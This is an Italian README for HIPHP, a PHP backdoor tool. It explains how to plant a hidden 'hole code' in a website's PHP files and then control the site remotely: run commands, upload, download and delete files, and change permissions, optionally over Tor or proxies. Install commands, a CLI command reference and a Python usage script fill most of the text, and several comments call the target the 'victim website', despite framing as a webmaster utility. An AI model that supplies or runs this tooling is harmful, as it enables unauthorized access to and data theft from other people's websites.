
Strumento backdoor basato su PHP per il controllo remoto di siti web tramite HTTP/HTTPS. Consente la gestione dei file, l'esecuzione di comandi e la connettività Tor con accesso protetto da password.
🚨 Nuova Build Disponibile!
WebHole ora supporta tutti i principali linguaggi web.
Scoprilo su GitHub: WebHole su GitHub
Progetto gratuito e open source per creare una backdoor per controllare siti web basati su PHP.
La backdoor HIPHP è uno strumento open source che consente il controllo remoto di siti web che utilizzano il linguaggio di programmazione PHP tramite il protocollo HTTP/HTTPS. Utilizzando il metodo POST/GET sulla porta 80, gli utenti possono accedere a una serie di funzionalità come il download e la modifica di file. Inoltre, offre la possibilità di connettersi alle reti Tor, fornendo un ulteriore livello di sicurezza tramite l'uso della protezione tramite password.
Sviluppato da un team di webmaster che volevano fornire un maggiore controllo sui propri siti senza dipendere da software o servizi di terze parti, HIPHP è una soluzione semplice e facile da usare. Inserendo il HIPHP_HOLE_CODE in qualsiasi file PHP all'interno della struttura delle directory del sito, agli utenti vengono concessi i diritti di accesso per apportare modifiche da qualsiasi parte del mondo. Questo lo rende una soluzione ideale per i proprietari di siti web che cercano una maggiore flessibilità nella gestione della loro presenza online.
La sicurezza è una priorità assoluta per HIPHP, con aggiornamenti regolari che garantiscono la compatibilità con diverse versioni del codice PHP utilizzato dai sistemi di gestione dei contenuti (CMS) più diffusi. La sua funzione di protezione tramite password aggiunge un ulteriore livello di difesa contro l'accesso non autorizzato. HIPHP è una soluzione sicura per coloro che cercano di riprendere il pieno controllo del proprio ambiente di hosting del sito web.
| Distribuzione | Controllo versione | Versione Python | Installazione | hiphp-cli | hiphp-desktop | hiphp-tk |
|---|---|---|---|---|---|---|
| Ubuntu | Ultima versione | 3.7 --> 3.11 | ✓ | ✓ | ✓ | ✓ |
| Windows | Ultima versione | 3.7 --> 3.11 | ✗ | ✓ | ✓ | ✓ |
| MacOS | Ultima versione | 3.7 --> 3.10 | ✗ | ✓ | ✓ | ✓ |
| Android-termux | Ultima versione | 3.7 --> 3.9 | ✓ | ✓ | ✗ | ✗ |
| Nethunter | Ultima versione | 3.7 --> 3.9 | ✓ | ✓ | ✓ | ✗ |
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t hiphp:latest
<p>clicca per vedere <a href="https://asciinema.org/a/QRlMY6JH9uwMCIbaV7F6lLoQ1">Demo</a></p><br>
<br>
<h4>Docker Hub pull build e run:</h4>```bash
# Pull:
❯ docker pull yasserbdj96/hiphp:latest
# Build:
❯ docker build -t docker.io/yasserbdj96/hiphp:latest .
# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as CLI with PROXIES:
❯ docker run -e KEY="<KEY>" -e URL="<URL>" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as GUI:
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t docker.io/yasserbdj96/hiphp:latest
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
clicca per vedere Demo
❯ docker build -t ghcr.io/yasserbdj96/hiphp:latest .
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t ghcr.io/yasserbdj96/hiphp:latest
<p>clicca per vedere <a href="https://asciinema.org/a/wDWAVo5GURsAbCUVseZsN2PdY">Demo</a></p><br>
<br>
<h2>Installazione:</h2>
<h4>Installazione del pacchetto Python:</h4>```bash
# Install from PYPI:
❯ pip install hiphp
# OR
❯ python -m pip install hiphp
# Local install:
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install
#❯ pip install -r requirements.txt
❯ pip install .
# Uninstall:
❯ pip uninstall hiphp
❯ cd hiphp
❯ cd install
❯ bash install.sh --install ❯ hiphp
❯ bash install.sh --update
❯ bash install.sh --uninstall
<br>
<h4>Installazione di Termux:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# Go to Installation folder:
❯ cd install
# Install:
❯ bash install.sh --termux --install
❯ hiphp
# Update:
❯ bash install.sh --termux --update
# Usage: hiphp [OPTION]
# Examples:
# hiphp --help # Show CLI help for hiphp.
# hiphp --geth [KEY] [URL] # Retrieve the HIPHP_HOLE_CODE encrypted by your [KEY].
# hiphp [KEY] [URL] # Connect to the victim's website in CLI mode.
# hiphp --version # Check the current version number.
# Uninstall:
❯ bash install.sh --termux --uninstall
❯ cd hiphp
❯ bash build_deb.sh
❯ sudo dpkg -i hiphp-.deb
❯ sudo apt install ./hiphp-.deb
<br>
<h2>Esegui senza installazione:</h2>
<h4>Esegui con hiphp-cli:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# default run on any os:
❯ python main.py --KEY="<KEY*>" --URL="<URL*>"
# Run with Makefile:
❯ make ARGUMENTS="--KEY='<KEY*>' --URL='<URL*>'" run
# For linux:
❯ cd hiphp-linux
❯ bash hiphp-cli.sh --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-cli.bat --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
--help, help # Display this help. --help [ACTIONS], help [ACTIONS] # Help for a specific command. --geth, geth # Get the HIPHP_HOLE_CODE (same purpose as --geth). --phpinfo, phpinfo # Display information about the server. --cls, cls # Clear the console. --exit, exit # Exit the console.
Actions:
--ls, ls # List files and folders (current directory by default). Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH] --ls # List all files and folders in the current directory. --ls [PATH] # List all files and folders in the specified directory. --ls -all # List all files, folders, and subfolders in the current directory. --ls -all [PATH] # List all files, folders, and subfolders in the specified directory.
--cat, cat # Concatenate a file to standard output. Usage: --cat [FILE_PATH]
--set, set # Create a code snippet that is always saved during work. Usage: --set [PHP_CODE] To reset to the initial value, use "--dset" or "dset".
--cd, cd # Change directory. Usage: --cd [PATH]
--rf, rf, run # Run code from a file. Usage: --rf [FILE_PATH] [VARIABLES] --rf [FILE_PATH] # Run code from a file. --rf [FILE_PATH] [VARIABLES] # Run code from a file with variables (e.g., --rf example.php var==hello).
--up, up, upload # Upload a file. Usage: --up [FILE_PATH] [PATH] --up [FILE_PATH] # Upload a file to the current directory. --up [FILE_PATH] [PATH] # Upload a file to a specified directory.
--down, down, download # Download a file. Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH] --down -f [FILE_PATH] # Download a file to the current directory. --down -f [FILE_PATH] [OUT_PATH] # Download a file to a specified directory. --down -d [DIR_PATH] # Download a folder to the current directory. --down -d [DIR_PATH] [OUT_PATH] # Download a folder to a specified directory. --down -all # Download all files to the current directory. --down -all [OUT_PATH] # Download all files to a specified directory.
--zip, zip # Compress a directory. Usage: --zip [DIR_PATH] --zip # Compress the current directory. --zip [DIR_PATH] # Compress a specific directory.
--edt, edt, edit # Edit files. Usage: --edt [FILE_PATH] CTRL+q # Exit the editor. CTRL+s # Save the changes.
--rm, rm, delete # Delete files and folders. Usage: --rm [-f/-d] [FILE/DIR_PATH] --rm -f [FILE_PATH] # Delete a file. --rm -d [DIR_PATH] # Delete a folder.
--mv, mv # Move files and folders. Usage: --mv [SOURCE] [DESTINATION]
--chmod, chmod # change file/folder permissions Usage: --chmod [PERMISSIONS] [FILE/DIR_PATH]
About:
--update, update # Check for updates. --license, license # View the project license. --about, about # About this project. --version, version # Get the current version number.
<br>
<h4>Esegui con hiphp-desktop:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# run with hiphp-desktop tool:
❯ python main.py --DST
# Run with Makefile:
❯ make ARGUMENTS="--DST" run
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Linux:
❯ cd hiphp-linux
❯ bash hiphp-desktop.sh
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-desktop.bat
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
❯ cd hiphp
❯ pip install -r requirements.txt ❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os. ❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
❯ python main.py --TK
❯ make ARGUMENTS="--TK" run
❯ make ARGUMENTS="--TK --KEY='' --URL=''" run
❯ cd hiphp-linux ❯ bash run-hiphp-tk.sh
❯ hiphp-win ❯ run-hiphp-tk.bat
<br>
<h2>Usa hiphp come script:</h2>
<h4>Utilizzo dello script:</h4>```python
# install hiphp package:
# ❯ pip install hiphp
# import hiphp package:
from hiphp import *
# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",proxies="<PROXIES>",retu=<RETURN>)# Default: retu=False
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
# PROXIES = To use a proxy.
# RETURN = True for return data as a string, false for print data in the console.
p1=hiphp(key="123",url="http://127.0.0.1/index.php")#Default: retu=False, proxies="". #p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser. #p1=hiphp(key="123",url="https://localhost.com/vvv2.php")
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php
p1.run("echo 'this is a test';")
p1.run_file("./examples.php")# Run code from file. p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.
p1.upload("./examples.php")# Upload a file to the current directory. p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.
p1.compress()# Compress the current directory. p1.compress("./example/")# Compress a specific directory.
p1.download("example.zip")# download a specific file to the current directory. p1.download("example.zip","<OUT_PATH>")# download a specific file to specific directory.
p1.cli() #}END.
<br>
<h2>Screenshot:</h2>
<div align="center">
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/26eba0a21247c621a1e22d366ed56aef53e66026deb91c0401f2f0600f5e467c.png" alt="Anteprima social di hiphp">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot0.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f7e873693e43b2997d506931b6263fc03ddb839b685f75510f8c3319eed26136.png" alt="hiphp-cli su linux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot1.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/ab8f73643879f0c6257da8f96f75d162525fec87a1d27a757ff1cd92c9f60676.png" alt="Aiuto di hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot2.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fcb6cc1affa5fd690891af13697e6354a39292accbb4e9f09c5591e4baec4985.png" alt="hiphp-cli installato su linux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot3.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/bf9b7f1ec5f8bc9fa33c59b864fed6f497d5b624844aa16f76c4e43af8019ce1.png" alt="hiphp-cli installato su termux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot4.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f0e8c087e50616ce47f188195b285d731af64dd79e7da5387bec0077f9346a8f.png" alt="hiphp-cli su windows">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot14.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/7730738d9028ad2f3c3367bc38b57085946236635df5343308754a86e47b1b31.png" alt="Scansione hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot5.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/44302c3ddc91b76b81e330a05cd87f3271ad2327d63eca6c46bf2eb84759b826.png" alt="Accesso hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot6.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/e1a1fb6fa6fd04f49c2ef656d42540e9c633e820e9292dcdeb9154dfbdb7bcfa.png" alt="hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot7.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/c63d4a141ab36bab58a529216ea78828691535c3581c39ed30ffb77ecd51aca6.png" alt="Editor hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot8.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/5883c9001d4cbdcd2dd0df082a4d8cc81fd766456efd548459fc598541222d2c.png" alt="Accesso hiphp-desktop in modalità scura">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot9.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/6f1a39895da6033d29e160360c31b1275997c0f180df371b61507bff3ae12dc9.png" alt="hiphp-desktop modalità scura">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot10.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f578c99a0f94623e73e24f5e15a502bc1a5fd0ebab925fc5f0c9b39a499d28d3.png" alt="Editor hiphp-desktop in modalità scura">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot11.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/29de8b71c3eb0e494749275cc9b641ee411b8c54f20dd71cba165ae587c301b7.png" alt="Impostazioni hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot12.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/cfefaeec60064d87318f897e145b6ba6017de9ef11b558c13b1a3cdc92e995ba.png" alt="Accesso hiphp-tk">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot13.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fe863889f956edac2ba2f30f0e366a29b0ae8d0f6320548093b40a2cd9690180.png" alt="hiphp-tk">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot15.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f75a974cfebdfe6d62a01f72e295061a01c8b296d120be9ce145d07fff01c284.png" alt="hiphp dopo l'installazione su linux">
</a>
</div>
<br>
<h2>Cronologia delle modifiche:</h2>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/CHANGELOG">Fai clic per visualizzare la cronologia delle modifiche</a>
<br>
<h2>Limitazioni:</h2>
1. Quando usi hiphp per la prima volta su un sito, il codice HIPHP_HOLE_CODE ti verrà mostrato, copialo e caricalo nel percorso a cui vuoi connetterti, ad esempio 'https://localhost/inc/example.php'.<br>
2. Affinché hiphp funzioni correttamente e senza errori, HIPHP_HOLE_CODE deve essere posizionato all'inizio del file di destinazione.<br>
3. hiphp non funzionerà e ti mostrerà un messaggio che indica che non sei in grado di connetterti al sito se non inserisci il percorso corretto della posizione di HIPHP_HOLE_CODE tramite il link.<br>
4. Se usi hiphp su siti .onion, devi eseguire i servizi tor o il browser tor.<br>
5. Se sei un utente Windows, devi modificare il file "config.ini".<br>
6. NON SONO RESPONSABILE DI COME USI I MIEI STRUMENTI/PROGRAMMI/PROGETTI. SII LEGALE E NON STUPIDO.
<br>
<h2>Sviluppato da:</h2>
Sviluppatore / Autore: [yasserbdj96](https://github.com/yasserbdj96)
<br>
<h2>Licenza:</h2>
<p>Il contenuto di questo repository è soggetto alla seguente <a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/LICENSE">LICENZA</a>.</p>
<br>
<h2>Supporto:</h2>
<p>Se ti piace questo progetto e vorresti vederlo continuare a migliorare, o se desideri che crei progetti più interessanti, considera di <a href="https://github.com/sponsors/yasserbdj96">sponsorizzarmi</a>.</p>
<br>
<br>
<p align="center">
<samp>
<a href="https://yasserbdj96.github.io/">sito web</a> .
<a href="https://github.com/yasserbdj96">github</a> .
<a href="https://gitlab.com/yasserbdj96">gitlab</a> .
<a href="https://www.linkedin.com/in/yasserbdj96">linkedin</a> .
<a href="https://twitter.com/yasserbdj96">twitter</a> .
<a href="https://instagram.com/yasserbdj96">instagram</a> .
<a href="https://www.facebook.com/yasserbdj96">facebook</a> .
<a href="https://www.youtube.com/@yasserbdj96">youtube</a> .
<a href="https://pypi.org/user/yasserbdj96">pypi</a> .
<a href="https://hub.docker.com/u/yasserbdj96">docker</a> .
<a href="https://t.me/yasserbdj96">telegram</a> .
<a href="https://gitter.im/yasserbdj96/yasserbdj96">gitter</a> .
<a href="mailto:[email protected]">e-mail</a> .
<a href="https://github.com/sponsors/yasserbdj96">sponsor</a>
</samp>
</p>